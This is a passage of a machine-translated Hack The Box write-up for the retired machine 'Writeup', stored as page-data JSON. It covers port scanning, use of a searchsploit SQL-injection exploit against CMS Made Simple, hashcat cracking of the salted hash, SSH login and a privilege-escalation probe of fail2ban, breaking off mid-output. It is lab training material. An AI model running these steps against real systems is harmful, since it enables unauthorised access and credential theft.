{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-writeup-en","result":{"data":{"markdownRemark":{"id":"697ae2fb-9707-52b1-9aea-3cb214c25e94","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-writeup\">original page</a>.</p>\n</blockquote>\n<p>I am learning about security using “Hack The Box,” a penetration testing learning platform.\nAt the time of writing, my rank on “Hack The Box” is ProHacker.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/5359265417f940dc8119c107426c30ca/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABW0lEQVQY0zWPTU8aURSG519076ZuNMoUBebecT6RITgEwUGwiARRY/we20SgaK07V7poumq6NHHroj/BX3UfL21cPDnJSd7nvMe4GaZcfTlR18NTks0m5fUmlXqTarJFvb1Ne2eXci1B+CXc0hrLKwFuFGP5ETIsI4KIrPQwLUdpMJ7/fFMvT/e8/v3N90lK//CM9GrE/vE5x+lXxrd3dAcHuGvrNDo9fTCh3uqwuzdgc7tHp79HzgmnQj4JXxmT25iHx6H69fMHd5NL4mSHrZ4WrFaxw5jB4QVeMcaM22SCGotOBRl4pF2BcFYIA5uFvItZkGohZ2JUmzOqfxQxHnXp9xr4DYtKy6XYEEStApXPNkFNYBVtiht5ZNnWYY8l6epGrn5XN7N8FgsmQfJBGXOZj3oxq2xniayQFELxn0BirU6xtEyS82xkSU93KtSNrHecf+JMXqr5rMkbq+PA9tiSbPUAAAAASUVORK5CYII='); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/5359265417f940dc8119c107426c30ca/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/5359265417f940dc8119c107426c30ca/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/5359265417f940dc8119c107426c30ca/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This is a writeup of the retired HackTheBox machine “Writeup”.</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage actions that violate social order.</strong></p>\n<p>Please note that attempting to attack environments other than those you own or are authorized to access may violate the Act on Prohibition of Unauthorized Computer Access (Unauthorized Access Prohibition Act).</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#obtaining-user\">Obtaining User</a></li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>For now, I will start with the usual port scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Add the target machine IP to HOSTS and run a fast scan</span>\n<span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.138 $RHOST/g'</span> /etc/hosts\nnmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n<span class=\"token comment\"># All ports</span>\nnmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt</code></pre></div>\n<p>Port 80 appears to be open, so I checked it.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">PORT   STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">7</span>.4p1 Debian <span class=\"token number\">10</span>+deb9u6 <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> <span class=\"token number\">37</span>:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> <span class=\"token number\">93</span>:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.25 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Debian<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: Nothing here yet.\n<span class=\"token operator\">|</span> http-robots.txt: <span class=\"token number\">1</span> disallowed entry \n<span class=\"token operator\">|</span>_/writeup/\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.25 <span class=\"token punctuation\">(</span>Debian<span class=\"token punctuation\">)</span>\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel</code></pre></div>\n<p>The part that caught my attention here was the following.</p>\n<p>It appeared to be configured so that user agents would not access <code class=\"language-text\">writeup</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">http-robots.txt: <span class=\"token number\">1</span> disallowed entry \n<span class=\"token operator\">|</span>_/writeup/</code></pre></div>\n<p>Reference: <a href=\"https://stackoverflow.com/questions/28422767/what-is-a-disallowed-entry-when-nmap-scans-through-the-robots-txt-file\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">What is a ‘disallowed entry’ when nmap scans through the Robots.txt file? - Stack Overflow</a></p>\n<p>The robots.txt file looked like this.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\">#              __</span>\n<span class=\"token comment\">#      _(\\    |@@|</span>\n<span class=\"token comment\">#     (__/\\__ \\--/ __</span>\n<span class=\"token comment\">#        \\___|----|  |   __</span>\n<span class=\"token comment\">#            \\ }{ /\\ )_ / _\\</span>\n<span class=\"token comment\">#            /\\__/\\ \\__O (__</span>\n<span class=\"token comment\">#           (--/\\--)    \\__/</span>\n<span class=\"token comment\">#           _)(  )(_</span>\n<span class=\"token comment\">#          `---''---`</span>\n\n<span class=\"token comment\"># Disallow access to the blog until content is finished.</span>\nUser-agent: * \nDisallow: /writeup/</code></pre></div>\n<p>When I accessed port 80, the following page was displayed.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 607px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/834ecbf8e70c540dd8654222063be7c7/ef9e5/image-20220810234932067.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 142.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAdCAYAAACqhkzFAAAACXBIWXMAAAsTAAALEwEAmpwYAAAERElEQVRIx5VUXW8bRRT1j+AX8AN4gQcqEttr7/qbJHa8tnfXjjcGRJEQIAFVqUSlljaACFDxrxDQtKGUtAm1XTtOnCKgSM06T4dzZ3btOGqQ+nB05t47c+Z+zG6smLoP27yLVaJibpO3UU7/qmzNtIlKiCi2ErI+cxdVwjJ2ESul7yNt7CFl/KEcK+l7WCYKqR21OZd6oLiY+p3+31Q8ipWYjJyRs1nuyxMxOZBJPYTJgATz3CwQ/5u8TLhAMRGRi0uhL8szyeQjJJJdLCZ7XFPUeIiYKNesLaxnfkTD3EIr85NCm3CtX+ARjnWb69uom3fQtH5WvgwPZ40HCpK9KTYviUk2SyxFehCVpHukS5eY7p/up/SuQiSYnc5+R4mLoNixqES9+d50EHJrjRmJLcJVNbhtxeIr8wKJSzukFXFeoHooAYclN1hSzbpD3kJd2VvKroe+05DS5WVIK6LstfgOYobxiOnuqVuMBKed2FVsKOYEk2SFPb1OaI78acJM7aqhJowuYjKhhWQfcaOPTH6AbHGAXHEY8gAWfeLPFGZsRTZh5gY8rzVEKxY3ZOxdpK0+vNYh7PpIoVoboeGO0GwforVGkJvCvuY1X/vqzgiLiS5ER0DBnnKIoF3bh5Huwcz0kTLlbXXhNEYKrnMAp665oZh+wq7ua0FmNxVcCAUb3gHypQFKy0MUWG7G5uEP/kbj/b/ghOx+qNmjLeulzp+4EIotGr0ww3gXBgVaN57B/eIY7Y1jONefob05Qev7E/i3Juj8MIG3eYL2rRO4ZJ9+ia1cC/CqMVDVzAsys9ZmAPebCfzvJpq/DVDfCJC5EqB0NYD3VYA12UNuk1vcU756jNcomDgrmGSGVWZXvh6gdjNQbN8I8PpHAV65SLwXIHGJYl9P9B5eVN2YIH/lXMEh7C+5+eYEdR6qcHOF6wufTPCSM8HLHQp+fIzi57zsms68yosLnz1PkEMx8o9Rv/QU9qdP4Vz+V7F7+SnSF4l3/0Gx8wRlb4xV/wnqnSO47xzBefsIq60x3pChEDNBqsszcd0D9RQ8L2TanifM9xhxU2IHao9L2Pa+Oi86c+8wxWfTbI+nj1ZxO3q8PNyMHvhsT8sfn3rYPYU5Qdksh9q+ZhFsr4+xvDJErXGg/Gv+bI+sG7xsJnjmYa+tH6pNfmesMvAptv7WGOXVoXr0YssFknW0dtznCMpHLZ/cKvshsPkdV8J1pRoiXEffefTNlytD3UM1FBEMJxSXsfMmyXYxMVsvxLvTj1+qsLJ95AqPkcnx75QjZ/uzoSRPCYpTsjQ47ZTZRzL6SVh9ZQuMdF/5JKZt/kBSUUJRhoZWlyyWVPNH07JXWM5ymT6WJtOUUquMiV9KFTvL97sw18NTGUYlqVIIsQWSlZWT2BkfbclwroeL4Q9WTTsZ9u0FEJ2NRE8NpTd9nC+EZO+8Kc9DgufF/u/Mf9l3m0/mEwu7AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/834ecbf8e70c540dd8654222063be7c7/8ac56/image-20220810234932067.webp 240w,\n/static/834ecbf8e70c540dd8654222063be7c7/d3be9/image-20220810234932067.webp 480w,\n/static/834ecbf8e70c540dd8654222063be7c7/bf9cb/image-20220810234932067.webp 607w\"\n              sizes=\"(max-width: 607px) 100vw, 607px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/834ecbf8e70c540dd8654222063be7c7/8ff5a/image-20220810234932067.png 240w,\n/static/834ecbf8e70c540dd8654222063be7c7/e85cb/image-20220810234932067.png 480w,\n/static/834ecbf8e70c540dd8654222063be7c7/ef9e5/image-20220810234932067.png 607w\"\n            sizes=\"(max-width: 607px) 100vw, 607px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/834ecbf8e70c540dd8654222063be7c7/ef9e5/image-20220810234932067.png\"\n            alt=\"image-20220810234932067\"\n            title=\"image-20220810234932067\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>While I was at it, the <code class=\"language-text\">writeup</code> page also displayed normally for some reason.</p>\n<p>I had assumed access was restricted by robots.txt, but there did not seem to be any actual access restriction.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 917px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/8c8163f1e8a28172390479dd3ba1c880/59000/image-20220811081451570.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 43.333333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABPklEQVQoz62QW0/CQBSE92dQRYqItAhRuZgQAmpiTPzh8m5ior7YKzUhtltaIIaWdjzdUiW+yiZfZnZ2z14Oa6htKESzdYFaXUW11oB8fArpsEJUIZWrKJGWDmRSWfgsk45OUKoopHXhpbIscnbZG2J4fY/R7QP6gxt0rsYYjO6EP+8M0Gz3obR6ULcoP3ShnnWF5uQ5e5xM8PL6hqnzAcuyYZoWLHuaQ3PDMKH/wdiy6wuYoevwPI59Dfb8tMQqXCNJEyTJ/2Hv2hfSFPt7YRhm302x2WwE2S2FL+brKEIcR4iiX+I4Jl0LirUsY7adNd6ApmvQtBzDNKjhusgcx6Eee+Cc5/i5+nNf9J5zH/MgzJUy5nEPrutSUBTtFJP3fR/L5QJBGFDhHCHpYhGSrvDppnQoMJultC9GEHB8A86SVZWVIFuMAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/8c8163f1e8a28172390479dd3ba1c880/8ac56/image-20220811081451570.webp 240w,\n/static/8c8163f1e8a28172390479dd3ba1c880/d3be9/image-20220811081451570.webp 480w,\n/static/8c8163f1e8a28172390479dd3ba1c880/f91b9/image-20220811081451570.webp 917w\"\n              sizes=\"(max-width: 917px) 100vw, 917px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/8c8163f1e8a28172390479dd3ba1c880/8ff5a/image-20220811081451570.png 240w,\n/static/8c8163f1e8a28172390479dd3ba1c880/e85cb/image-20220811081451570.png 480w,\n/static/8c8163f1e8a28172390479dd3ba1c880/59000/image-20220811081451570.png 917w\"\n            sizes=\"(max-width: 917px) 100vw, 917px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/8c8163f1e8a28172390479dd3ba1c880/59000/image-20220811081451570.png\"\n            alt=\"image-20220811081451570\"\n            title=\"image-20220811081451570\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Looking at the contents, it seemed to contain writeups for several HTB machines.</p>\n<p>However, the writeup for this machine was only partially written and did not contain any useful information.</p>\n<p>Also, when I tried enumerating with gobuster, it returned an error, and after that I could not even access the site in my browser for a while.</p>\n<p>It seems some sort of DoS protection was in place, apparently monitoring for 4xx errors.</p>\n<p>The Writeup page was accessed using a GET query like the following.</p>\n<p>Example: <code class=\"language-text\">http://10.10.10.138/writeup/index.php?page=ypuffy</code></p>\n<h2 id=\"obtaining-user\" style=\"position:relative;\"><a href=\"#obtaining-user\" aria-label=\"obtaining user permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Obtaining User</h2>\n<p>My guess was that it was retrieving text from the server by setting a file name in <code class=\"language-text\">page=</code>.</p>\n<p>However, I was not able to make progress with enumeration here.</p>\n<p>Next, from the page source I learned that it was using <code class=\"language-text\">CMS Made Simple</code>, so I tried several exploits against it.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 751px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/1e02c583771524cd542ffc4b0b688653/c483d/image-20220811105655958.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 47.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABxElEQVQoz52R2VITQRSG5yFcUBQhZliTYCAmiMiFy/tSXqg3kk3fwBuqApSSSWZNJrP2TEg+O12EB+BUffX/Z+k61XW0tfUiheI2rzY2ea3vsvqiwKPHqzx7vs72XpVKtUF5v075TYPq4TF7lbdyrsRGYYvNrRK6pKjv8XRljScrL9H07X0WHJ9+ofH+I4eNU3bKNXZKNfm4TrV2wtHJJ959+MxB/YRy9YjS3YKt3QP0naqioFcU2tnZV759/0G706XZ6tDp/Jb+l/KKZodWu0u73b2rte97P89b95w32wqNKUzDmMAbk4pb8ihhGmc8NLTJMMA3+tz0+vQuA66uJlxeWPztjbm6jDH6Mf4oJk1zokgQhoIkyQgCoYjl8gXLnhY5EZFnEzhDTGPMcCgwBxNsM8A2XCzDw7RiXC/FcRJMU3o3wZPEUU6W3SLEkhmaCFMCP8TyLEaBg+H8wxpZuL6r8oHbl7mJ6Q6UOmMbW/Udho6hfBBO5A8SpVrsRdgXJjd/rhkaUq9tQrkgyzJJLrcKMpEpzfP8Xpd+MbfUNE3lUWTEbog/GOH7AWksYMbDjzKfzckTgUhSwiCXpblqzOfzB/Efum+a15+6RmAAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/1e02c583771524cd542ffc4b0b688653/8ac56/image-20220811105655958.webp 240w,\n/static/1e02c583771524cd542ffc4b0b688653/d3be9/image-20220811105655958.webp 480w,\n/static/1e02c583771524cd542ffc4b0b688653/0d6a7/image-20220811105655958.webp 751w\"\n              sizes=\"(max-width: 751px) 100vw, 751px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/1e02c583771524cd542ffc4b0b688653/8ff5a/image-20220811105655958.png 240w,\n/static/1e02c583771524cd542ffc4b0b688653/e85cb/image-20220811105655958.png 480w,\n/static/1e02c583771524cd542ffc4b0b688653/c483d/image-20220811105655958.png 751w\"\n            sizes=\"(max-width: 751px) 100vw, 751px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/1e02c583771524cd542ffc4b0b688653/c483d/image-20220811105655958.png\"\n            alt=\"image-20220811105655958\"\n            title=\"image-20220811105655958\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Among the things I looked into, I found the following exploit.</p>\n<p>It appears that blind SQL injection was possible.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ searchsploit -m php/webapps/46635.py</code></pre></div>\n<p>Running the exploit allowed me to obtain a username and password hash.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 563px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/76bfc181db1ea0eb37a90d996763358e/7cb89/image-20220811110039876.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 31.666666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABHklEQVQY0zWPa26DMBCEOVGlYgyEGAx+BxLyVtI2Snv/S0zXJvnxadaz3vU447WADRO63qDXHk07QEiNwQTIwaIjot8rR7V7eQ6MN/j4LFMvTHu676HsBhlnDHmeg5GynIEXBTgrFn3DX1BdvLyyLFER8Rxni4IgzeTsIIJCO+qkcjRQ1wnqPEJOlG4f0AWN1g1Qly3UaZN65rZLWtU1qipSJTL7c0gN/3uCvs8wXzPc44CBPPs80lIDYftEI1uUnKfBmDBB50RMHBdqeqk/BOjvmRJMMLQ0evY2I/ydYR9HeFL3PFHyLeTWLslnn9K/dT0sj2VhChinDcYdpaTaewsdDG73C8LowesKK9GgXi80UmDVCTR9m+o38esx5T/LvdLMzNj+PgAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/76bfc181db1ea0eb37a90d996763358e/8ac56/image-20220811110039876.webp 240w,\n/static/76bfc181db1ea0eb37a90d996763358e/d3be9/image-20220811110039876.webp 480w,\n/static/76bfc181db1ea0eb37a90d996763358e/a1a69/image-20220811110039876.webp 563w\"\n              sizes=\"(max-width: 563px) 100vw, 563px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/76bfc181db1ea0eb37a90d996763358e/8ff5a/image-20220811110039876.png 240w,\n/static/76bfc181db1ea0eb37a90d996763358e/e85cb/image-20220811110039876.png 480w,\n/static/76bfc181db1ea0eb37a90d996763358e/7cb89/image-20220811110039876.png 563w\"\n            sizes=\"(max-width: 563px) 100vw, 563px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/76bfc181db1ea0eb37a90d996763358e/7cb89/image-20220811110039876.png\"\n            alt=\"image-20220811110039876\"\n            title=\"image-20220811110039876\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>After formatting the output salt and password hash as <code class=\"language-text\">$hash:$salt</code> and cracking it as <code class=\"language-text\">md5($salt.$pass)</code>, I was able to recover the password.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ hashcat -a <span class=\"token number\">0</span> -m <span class=\"token number\">20</span> ./hash /usr/share/wordlists/rockyou.txt</code></pre></div>\n<p>Using this password to connect over SSH allowed me to obtain user access.</p>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>With <code class=\"language-text\">pspy</code> running, when I triggered fail2ban I confirmed that the following task was executed.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token assign-left variable\">PID</span><span class=\"token operator\">=</span><span class=\"token number\">22658</span>  <span class=\"token operator\">|</span> iptables -w -I f2b-apache-404 <span class=\"token number\">1</span> -s <span class=\"token number\">10.10</span>.14.4 -j REJECT --reject-with icmp-port-unreachable</code></pre></div>\n<p>Since fail2ban appeared to be running with root privileges, I investigated whether I could use that as a starting point for privilege escalation. However, even after checking the configuration files and permissions under <code class=\"language-text\">/etc/fail2ban</code>, I could not find anything useful.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">cat</span> /etc/fail2ban/jail.local \n<span class=\"token punctuation\">[</span>INCLUDES<span class=\"token punctuation\">]</span>\nbefore <span class=\"token operator\">=</span> paths-debian.conf\n\n<span class=\"token punctuation\">[</span>DEFAULT<span class=\"token punctuation\">]</span>\nignoreip <span class=\"token operator\">=</span> <span class=\"token number\">127.0</span>.0.1/8\nbantime  <span class=\"token operator\">=</span> <span class=\"token number\">120</span>\nmaxretry <span class=\"token operator\">=</span> <span class=\"token number\">10</span>\n\n<span class=\"token punctuation\">[</span>sshd<span class=\"token punctuation\">]</span>\nenabled <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span>\n\n<span class=\"token punctuation\">[</span>apache-404<span class=\"token punctuation\">]</span>\nenabled  <span class=\"token operator\">=</span> <span class=\"token boolean\">true</span>\nport     <span class=\"token operator\">=</span> http\nfilter   <span class=\"token operator\">=</span> apache-404\nlogpath  <span class=\"token operator\">=</span> /var/log/apache2/access.log <span class=\"token function\">tail</span>\nmaxretry <span class=\"token operator\">=</span> <span class=\"token number\">30</span>\n\n$ <span class=\"token function\">cat</span> /etc/fail2ban/filter.d/apache-404.conf \n<span class=\"token punctuation\">[</span>INCLUDES<span class=\"token punctuation\">]</span>\nbefore <span class=\"token operator\">=</span> apache-common.conf\n\n<span class=\"token punctuation\">[</span>Definition<span class=\"token punctuation\">]</span>\nfailregex <span class=\"token operator\">=</span> ^<span class=\"token operator\">&lt;</span>HOST<span class=\"token operator\">></span> .* <span class=\"token number\">40</span><span class=\"token punctuation\">[</span><span class=\"token number\">1234</span><span class=\"token punctuation\">]</span>$</code></pre></div>\n<p>At this point, the linpeas output showed that the current user belonged to various groups.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">id</span>\n<span class=\"token assign-left variable\">uid</span><span class=\"token operator\">=</span><span class=\"token number\">1000</span><span class=\"token punctuation\">(</span>jkr<span class=\"token punctuation\">)</span> <span class=\"token assign-left variable\">gid</span><span class=\"token operator\">=</span><span class=\"token number\">1000</span><span class=\"token punctuation\">(</span>jkr<span class=\"token punctuation\">)</span> <span class=\"token assign-left variable\">groups</span><span class=\"token 